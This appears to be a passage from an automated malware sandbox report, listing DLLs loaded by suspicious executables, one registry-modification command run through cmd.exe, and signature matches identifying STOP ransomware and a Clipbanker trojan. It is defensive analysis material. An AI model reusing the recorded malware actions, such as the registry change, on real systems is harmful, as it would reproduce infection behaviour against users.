Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Section loaded: samlib.dll
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\System32\cmd.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\cmd.exe Section loaded: propsys.dll
Source: C:\Windows\System32\cmd.exe Section loaded: profapi.dll
Source: C:\Windows\System32\cmd.exe Section loaded: edputil.dll
Source: C:\Windows\System32\cmd.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\cmd.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\cmd.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\cmd.exe Section loaded: netutils.dll
Source: C:\Windows\System32\cmd.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\cmd.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\cmd.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\cmd.exe Section loaded: slc.dll
Source: C:\Windows\System32\cmd.exe Section loaded: userenv.dll
Source: C:\Windows\System32\cmd.exe Section loaded: sppc.dll
Source: C:\Windows\System32\cmd.exe Section loaded: mpr.dll
Source: C:\Windows\System32\cmd.exe Section loaded: pcacli.dll
Source: C:\Windows\System32\cmd.exe Section loaded: sfc_os.dll
Source: C:\Windows\explorer.exe Section loaded: aepic.dll
Source: C:\Windows\explorer.exe Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: propsys.dll
Source: C:\Windows\explorer.exe Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe Section loaded: wininet.dll
Source: C:\Windows\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe Section loaded: wldp.dll
Source: C:\Windows\explorer.exe Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe Section loaded: netutils.dll
Source: C:\Windows\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe Section loaded: ninput.dll
Source: C:\Windows\explorer.exe Section loaded: appresolver.dll
Source: C:\Windows\explorer.exe Section loaded: bcp47langs.dll
Source: C:\Windows\explorer.exe Section loaded: slc.dll
Source: C:\Windows\explorer.exe Section loaded: sppc.dll
Source: C:\Windows\explorer.exe Section loaded: profapi.dll
Source: C:\Windows\explorer.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\explorer.exe Section loaded: starttiledata.dll
Source: C:\Windows\explorer.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\explorer.exe Section loaded: idstore.dll
Source: C:\Windows\explorer.exe Section loaded: usermgrcli.dll
Source: C:\Windows\explorer.exe Section loaded: windows.applicationmodel.dll
Source: C:\Windows\explorer.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\explorer.exe Section loaded: usermgrproxy.dll
Source: C:\Windows\explorer.exe Section loaded: wlidprov.dll
Source: C:\Windows\explorer.exe Section loaded: samcli.dll
Source: C:\Windows\explorer.exe Section loaded: policymanager.dll
Source: C:\Windows\explorer.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\explorer.exe Section loaded: winsta.dll
Source: C:\Windows\explorer.exe Section loaded: sndvolsso.dll
Source: C:\Windows\explorer.exe Section loaded: mmdevapi.dll
Source: C:\Windows\explorer.exe Section loaded: devobj.dll
Source: C:\Windows\explorer.exe Section loaded: windows.staterepositoryclient.dll
Source: C:\Windows\explorer.exe Section loaded: oleacc.dll
Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.dll
Source: C:\Windows\explorer.exe Section loaded: wintypes.dll
Source: C:\Windows\explorer.exe Section loaded: textshaping.dll
Source: C:\Windows\explorer.exe Section loaded: windows.ui.dll
Source: C:\Windows\explorer.exe Section loaded: windowmanagementapi.dll
Source: C:\Windows\explorer.exe Section loaded: textinputframework.dll
Source: C:\Windows\explorer.exe Section loaded: inputhost.dll
Source: C:\Windows\explorer.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\explorer.exe Section loaded: appextension.dll
Source: C:\Windows\explorer.exe Section loaded: windowscodecs.dll
Source: C:\Windows\explorer.exe Section loaded: dcomp.dll
Source: C:\Windows\explorer.exe Section loaded: d3d11.dll
Source: C:\Windows\explorer.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\explorer.exe Section loaded: d3d10warp.dll
Source: C:\Windows\explorer.exe Section loaded: dxcore.dll
Source: C:\Windows\explorer.exe Section loaded: d2d1.dll
Source: C:\Windows\explorer.exe Section loaded: dwrite.dll
Source: C:\Windows\explorer.exe Section loaded: xmllite.dll
Source: C:\Windows\explorer.exe Section loaded: dataexchange.dll
Source: C:\Windows\explorer.exe Section loaded: cldapi.dll
Source: C:\Windows\explorer.exe Section loaded: fltlib.dll
Source: C:\Windows\explorer.exe Section loaded: apphelp.dll
Source: C:\Windows\explorer.exe Section loaded: tiledatarepository.dll
Source: C:\Windows\explorer.exe Section loaded: staterepository.core.dll
Source: C:\Windows\explorer.exe Section loaded: windows.staterepository.dll
Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\explorer.exe Section loaded: explorerframe.dll
Source: C:\Windows\explorer.exe Section loaded: windows.staterepositorycore.dll
Source: C:\Windows\explorer.exe Section loaded: mrmcorer.dll
Source: C:\Windows\explorer.exe Section loaded: twinui.pcshell.dll
Source: C:\Windows\explorer.exe Section loaded: wkscli.dll
Source: C:\Windows\explorer.exe Section loaded: wincorlib.dll
Source: C:\Windows\explorer.exe Section loaded: cdp.dll
Source: C:\Windows\explorer.exe Section loaded: dsreg.dll
Source: C:\Windows\explorer.exe Section loaded: languageoverlayutil.dll
Source: C:\Windows\explorer.exe Section loaded: bcp47mrm.dll
Source: C:\Windows\explorer.exe Section loaded: windows.immersiveshell.serviceprovider.dll
Source: C:\Windows\explorer.exe Section loaded: thumbcache.dll
Source: C:\Windows\explorer.exe Section loaded: edputil.dll
Source: C:\Windows\explorer.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\explorer.exe Section loaded: photometadatahandler.dll
Source: C:\Windows\explorer.exe Section loaded: twinui.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: twinui.dll
Source: C:\Windows\explorer.exe Section loaded: pdh.dll
Source: C:\Windows\explorer.exe Section loaded: applicationframe.dll
Source: C:\Windows\explorer.exe Section loaded: ntshrui.dll
Source: C:\Windows\explorer.exe Section loaded: cscapi.dll
Source: C:\Windows\explorer.exe Section loaded: linkinfo.dll
Source: C:\Windows\explorer.exe Section loaded: rmclient.dll
Source: C:\Windows\explorer.exe Section loaded: ehstorshell.dll
Source: C:\Windows\explorer.exe Section loaded: cscui.dll
Source: C:\Windows\explorer.exe Section loaded: holographicextensions.dll
Source: C:\Windows\explorer.exe Section loaded: virtualmonitormanager.dll
Source: C:\Windows\explorer.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\explorer.exe Section loaded: windows.ui.immersive.dll
Source: C:\Windows\explorer.exe Section loaded: abovelockapphost.dll
Source: C:\Windows\explorer.exe Section loaded: npsm.dll
Source: C:\Windows\explorer.exe Section loaded: windows.web.dll
Source: C:\Windows\explorer.exe Section loaded: windows.shell.bluelightreduction.dll
Source: C:\Windows\explorer.exe Section loaded: mscms.dll
Source: C:\Windows\explorer.exe Section loaded: coloradapterclient.dll
Source: C:\Windows\explorer.exe Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe Section loaded: windows.internal.signals.dll
Source: C:\Windows\explorer.exe Section loaded: tdh.dll
Source: C:\Windows\explorer.exe Section loaded: windows.staterepositorybroker.dll
Source: C:\Windows\explorer.exe Section loaded: mfplat.dll
Source: C:\Windows\explorer.exe Section loaded: rtworkq.dll
Source: C:\Windows\explorer.exe Section loaded: taskflowdatauser.dll
Source: C:\Windows\explorer.exe Section loaded: structuredquery.dll
Source: C:\Windows\explorer.exe Section loaded: actxprxy.dll
Source: C:\Windows\explorer.exe Section loaded: windows.security.authentication.web.core.dll
Source: C:\Windows\explorer.exe Section loaded: windows.data.activities.dll
Source: C:\Windows\explorer.exe Section loaded: windows.system.launcher.dll
Source: C:\Windows\explorer.exe Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Windows\explorer.exe Section loaded: windows.internal.ui.shell.windowtabmanager.dll
Source: C:\Windows\explorer.exe Section loaded: windows.devices.enumeration.dll
Source: C:\Windows\explorer.exe Section loaded: notificationcontrollerps.dll
Source: C:\Windows\explorer.exe Section loaded: windows.globalization.dll
Source: C:\Windows\explorer.exe Section loaded: icu.dll
Source: C:\Windows\explorer.exe Section loaded: mswb7.dll
Source: C:\Windows\explorer.exe Section loaded: devdispitemprovider.dll
Source: C:\Windows\explorer.exe Section loaded: windows.networking.connectivity.dll
Source: C:\Windows\explorer.exe Section loaded: uianimation.dll
Source: C:\Windows\explorer.exe Section loaded: windows.ui.core.textinput.dll
Source: C:\Windows\explorer.exe Section loaded: windowsudk.shellcommon.dll
Source: C:\Windows\explorer.exe Section loaded: dictationmanager.dll
Source: C:\Windows\explorer.exe Section loaded: npmproxy.dll
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe Section loaded: winnsi.dll
Source: C:\Windows\explorer.exe Section loaded: dpapi.dll
Source: C:\Windows\explorer.exe Section loaded: msasn1.dll
Source: C:\Windows\explorer.exe Section loaded: rsaenh.dll
Source: C:\Windows\explorer.exe Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe Section loaded: rasadhlp.dll
Source: C:\Windows\explorer.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\explorer.exe Section loaded: schannel.dll
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\explorer.exe Section loaded: ntasn1.dll
Source: C:\Windows\explorer.exe Section loaded: ncrypt.dll
Source: C:\Windows\explorer.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\explorer.exe Section loaded: gpapi.dll
Source: C:\Windows\explorer.exe Section loaded: pcshellcommonproxystub.dll
Source: C:\Windows\explorer.exe Section loaded: shellcommoncommonproxystub.dll
Source: C:\Windows\explorer.exe Section loaded: cryptngc.dll
Source: C:\Windows\explorer.exe Section loaded: cflapi.dll
Source: C:\Windows\explorer.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\explorer.exe Section loaded: daxexec.dll
Source: C:\Windows\explorer.exe Section loaded: container.dll
Source: C:\Windows\explorer.exe Section loaded: stobject.dll
Source: C:\Windows\explorer.exe Section loaded: wmiclnt.dll
Source: C:\Windows\explorer.exe Section loaded: workfoldersshell.dll
Source: C:\Windows\explorer.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Windows\explorer.exe Section loaded: uiautomationcore.dll
Source: C:\Windows\explorer.exe Section loaded: samlib.dll
Source: C:\Windows\explorer.exe Section loaded: batmeter.dll
Source: C:\Windows\explorer.exe Section loaded: capabilityaccessmanagerclient.dll
Source: C:\Windows\explorer.exe Section loaded: sxs.dll
Source: C:\Windows\explorer.exe Section loaded: inputswitch.dll
Source: C:\Windows\explorer.exe Section loaded: es.dll
Source: C:\Windows\explorer.exe Section loaded: prnfldr.dll
Source: C:\Windows\explorer.exe Section loaded: windows.ui.shell.dll
Source: C:\Windows\explorer.exe Section loaded: wpnclient.dll
Source: C:\Windows\explorer.exe Section loaded: atlthunk.dll
Source: C:\Windows\explorer.exe Section loaded: dxp.dll
Source: C:\Windows\explorer.exe Section loaded: shdocvw.dll
Source: C:\Windows\explorer.exe Section loaded: syncreg.dll
Source: C:\Windows\explorer.exe Section loaded: audioses.dll
Source: 6uVlPQSJ4e.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: 43.2.build3.exe.24115a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 43.2.build3.exe.24115a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 11.2.DB15.exe.28715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.2.DB15.exe.28715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 22.2.DB15.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 22.2.DB15.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 18.2.DB15.exe.28915a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 18.2.DB15.exe.28915a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.2.DB15.exe.28715a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.2.DB15.exe.28715a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 28.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
